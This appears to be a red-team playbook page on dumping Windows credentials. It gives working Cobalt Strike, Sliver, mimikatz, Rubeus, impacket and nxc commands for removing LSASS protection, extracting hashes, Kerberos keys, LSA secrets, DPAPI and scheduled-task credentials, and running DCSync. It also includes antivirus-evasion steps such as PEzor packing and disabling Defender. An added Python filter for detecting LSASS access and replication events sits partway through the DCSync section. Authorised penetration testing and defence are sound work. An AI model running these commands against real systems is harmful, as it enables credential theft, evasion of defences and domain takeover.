Credential Dumping
Extracting credential material (plaintext, NTLM hashes, Kerberos keys/tickets, cached creds) from a compromised host. Requires elevated/SYSTEM access for most techniques. Credentials enable lateral movement, privilege escalation, and domain compromise.
See d. Deconfliction & Reporting for credential handling and secure destruction post-engagement.
Disable LSA Protection
LSA Protection (RunAsPPL) prevents non-protected processes from opening handles to LSASS. If enabled, Mimikatz credential dumps will fail. Requires loading the mimidrv.sys kernel driver to remove the protection.
OPSEC: Loading a kernel driver is very noisy — generates Sysmon Event 6 (Driver Loaded) and may trigger EDR. Only do this if creds cannot be obtained otherwise.
Sliver
# Upload mimidrv.sys to the directory where mimikatz will execute from
upload /path/to/mimidrv.sys c:/windows/temp/mimidrv.sys
cd c:/windows/temp/
# Load driver and remove LSASS protection
mimikatz '"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove"'
LSASS — Logon Passwords (NTLM Hashes)
Dumps NTLM hashes (and occasionally plaintext if wdigest is enabled) from logged-on users via LSASS memory. Plaintext is rare on Win10+ due to wdigest being disabled by default.
OPSEC: Opens a read handle to LSASS — logged under Event 4656, commonly flagged by EDR.
Cobalt Strike
beacon> logonpasswords
# or the full mimikatz command
beacon> mimikatz !sekurlsa::logonpasswords
Sliver
# Using built-in mimikatz extension
mimikatz "token::elevate" "sekurlsa::logonpasswords" "exit"
# Using SharpKatz (avoids dropping mimikatz to disk)
execute-assembly /path/to/SharpKatz.exe --Command logonpasswords
# PEZor-packed mimikatz (bypasses AV signatures)
PEzor -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /path/to/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"'
execute-assembly /path/to/mimikatz.exe.packed.dotnet.exe
Manual
# Remote dump via impacket (needs local admin creds or hash)
impacket-secretsdump ./Administrator@TARGET -hashes ':NTHASH' -dc-ip DC_IP -target-ip TARGET_IP
# With plaintext creds
impacket-secretsdump DOMAIN/user:'Password'@TARGET -dc-ip DC_IP -target-ip TARGET_IP
LSASS — Kerberos Encryption Keys
Dumps AES256, AES128, and DES keys for logged-on users. Preferred over NTLM hashes as Kerberos is the default auth protocol — blends into normal traffic better.
OPSEC: Same LSASS handle risk as logonpasswords (Event 4656).
Cobalt Strike
beacon> mimikatz !sekurlsa::ekeys
Sliver
mimikatz "token::elevate" "sekurlsa::ekeys" "exit"
execute-assembly /path/to/SharpKatz.exe --Command ekeys
SAM Database (Local Account Hashes)
Extracts NTLM hashes of local accounts only, from the Security Account Manager (SAM). Useful when a shared local admin password is reused across the environment.
OPSEC: Opens a handle to the SAM registry hive.
Cobalt Strike
beacon> mimikatz !lsadump::sam
Sliver
mimikatz "token::elevate" "lsadump::sam" "exit"
Manual
# Remote SAM dump via nxc
nxc smb TARGET --use-kcache --sam
# Or via impacket
impacket-secretsdump ./Administrator@TARGET -hashes ':NTHASH'
LSA Secrets
Dumps LSA secrets from the registry (HKLM\SECURITY). Contains service account passwords, auto-logon credentials, DPAPI machine keys, and other sensitive data stored by the system.
Cobalt Strike
beacon> mimikatz !lsadump::secrets
Sliver
mimikatz "token::elevate" "lsadump::secrets" "exit"
Domain Cached Credentials (DCC2)
Cached domain creds stored locally for offline logon (e.g. roaming laptops). Extracted from HKLM\SECURITY. Crackable but orders of magnitude slower than NTLM.
Cobalt Strike
beacon> mimikatz !lsadump::cache
Sliver
mimikatz "token::elevate" "lsadump::cache" "exit"
Cracking
# Format: $DCC2$<iterations>#<username>#<hash>
hashcat -m 2100 dcc2_hashes.txt wordlist.txt
Credential Vault
Windows Credential Vault stores credentials for scheduled tasks, Windows services, and other system components. Distinct from Credential Manager (user-facing).
Cobalt Strike
beacon> mimikatz !vault::list
beacon> mimikatz !vault::cred /patch
Sliver
mimikatz '"token::elevate" "vault::list" "exit"'
mimikatz '"token::elevate" "vault::cred /patch" "exit"'
Kerberos Ticket Extraction (Rubeus)
Uses legitimate Windows APIs to extract Kerberos tickets from memory — does not open a handle to LSASS, making it quieter than Mimikatz.
triage lists all tickets in the current logon session (or in all sessions, if elevated); dump extracts them.
Cobalt Strike
# List all tickets
beacon> execute-assembly Rubeus.exe triage
# Dump specific TGT by LUID
beacon> execute-assembly Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
Sliver
execute-assembly /path/to/Rubeus.exe triage
execute-assembly /path/to/Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
/nowrap formats the base64 ticket onto a single line for easy copy-paste.
DPAPI — Credential Manager & Saved Secrets
Windows Credential Manager stores saved credentials (RDP, browser, etc.) encrypted via DPAPI. Decryption requires the user’s master key, obtainable from LSASS cache (if recently used) or via MS-BKRP from the DC.
Cobalt Strike
# 1. Enumerate vaults
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
beacon> execute-assembly Seatbelt.exe WindowsVault
# 2. Find credential blobs
beacon> ls C:\Users\<user>\AppData\Local\Microsoft\Credentials
beacon> execute-assembly Seatbelt.exe WindowsCredentialFiles
# 3. Get master key (option A: from LSASS cache, needs elevation)
beacon> mimikatz !sekurlsa::dpapi
# 3. Get master key (option B: request from DC via MS-BKRP, must run as the target user)
beacon> mimikatz @dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID> /rpc
# 4. Decrypt the credential blob
beacon> mimikatz dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<BLOB_ID> /masterkey:<KEY>
Note: the MS-BKRP method (@ modifier) must execute in the context of the user who owns the key. If running as SYSTEM or another user, impersonate the target first.
Scheduled Task Credentials
Scheduled tasks that “run whether user is logged on or not” store encrypted credentials. Same DPAPI flow but blobs are under the SYSTEM profile.
Cobalt Strike
# 1. List blobs
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
# 2. Identify master key GUID
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<BLOB_ID>
# 3. Get master key from LSASS
beacon> mimikatz !sekurlsa::dpapi
# 4. Decrypt
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<BLOB_ID> /masterkey:<KEY>
DCSync
Abuses the Directory Replication Service (MS-DRSR) protocol to replicate credential data directly from a Domain Controller. Requires replication privileges (Domain Admin, or an account with DS-Replication-Get-Changes + DS-Replication-Get-Changes-All).
OPSEC: Detectable via Event 4662 with GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 89e95b76-444d-4c62-991a-0facbeda640c. Replication traffic normally only occurs between DCs — anomalous sources are suspicious.
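A small triage filter for the two detection signals this page names, the LSASS handle opens (Event 4656) from the logonpasswords/ekeys sections and the replication-right access (Event 4662) above. This is an added example, not code from the page; the DC account names, the LSASS reader allowlist and the sample events are constructed.

```python
import re

# Control-access GUIDs for DS-Replication-Get-Changes / -Get-Changes-All (from the text).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Hypothetical allowlists: DC computer accounts, and processes expected to open LSASS.
DC_ACCOUNTS = {"DC01$", "DC02$"}
LSASS_READERS = {r"c:\windows\system32\wininit.exe", r"c:\windows\system32\csrss.exe"}

def replication_from_non_dc(ev: dict) -> bool:
    """Event 4662 granting replication rights to a principal that is not a DC."""
    if ev.get("EventID") != 4662:
        return False
    guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    return bool(guids & REPLICATION_GUIDS) and ev.get("SubjectUserName") not in DC_ACCOUNTS

def lsass_handle_from_unknown_process(ev: dict) -> bool:
    """Event 4656 handle request on lsass.exe from a process outside the allowlist."""
    if ev.get("EventID") != 4656:
        return False
    if not ev.get("ObjectName", "").lower().endswith("\\lsass.exe"):
        return False
    return ev.get("ProcessName", "").lower() not in LSASS_READERS

def triage(events):
    """Return (EventID, SubjectUserName) for every event matching either rule."""
    return [(ev["EventID"], ev.get("SubjectUserName")) for ev in events
            if replication_from_non_dc(ev) or lsass_handle_from_unknown_process(ev)]

# Constructed sample events (field names follow the Security log's EventData).
LSASS = r"\Device\HarddiskVolume2\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},  # DC-to-DC: benign
    {"EventID": 4662, "SubjectUserName": "jsmith", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},  # user account: flag
    {"EventID": 4656, "SubjectUserName": "SYSTEM", "ObjectName": LSASS, "ProcessName": r"C:\Windows\System32\wininit.exe"},  # allowlisted reader
    {"EventID": 4656, "SubjectUserName": "jsmith", "ObjectName": LSASS, "ProcessName": r"C:\Users\jsmith\Downloads\update.exe"},  # unknown reader: flag
    {"EventID": 4624, "SubjectUserName": "jsmith"},  # unrelated event, ignored
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("suspicious:", hit)
```

Both rules are allowlist-based, so a missing DC or a legitimate LSASS reader shows up as a false positive rather than a miss; tune the two sets to the environment before relying on them.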
Cobalt Strike
beacon> dcsync DOMAIN\krbtgt
Sliver
# SharpKatz — must specify domain-qualified usernames or it won't work
execute-assembly /path/to/SharpKatz.exe --Command dcsync --Domain domain.com --DomainController dc01.domain.com
# Specific user (note DOMAIN\\ double-escaped)
execute-assembly /path/to/SharpKatz.exe --Command dcsync --User DOMAIN\\Administrator --Domain domain.com --DomainController dc01.domain.com
Manual
# impacket
impacket-secretsdump DOMAIN/user:'Password'@DC_IP -just-dc-user krbtgt
# nxc — full NTDS dump
nxc smb dc01.domain.com -d DOMAIN -u user -p 'password' --ntds --user krbtgt
Bulk Dump Tools
Quick-and-dirty approaches when stealth is less of a concern.
Sliver
# LaZagne — dumps creds from browsers, mail clients, sysadmin tools, etc.
# Not C#, so may trigger AV — disable Defender first if needed
upload /path/to/LaZagne.exe
execute -o LaZagne.exe all -v
Manual
# Full remote dump via nxc (SAM + LSA + DPAPI + NTDS)
nxc smb dc01.domain.com --use-kcache --sam --lsa --dpapi -M ntdsutil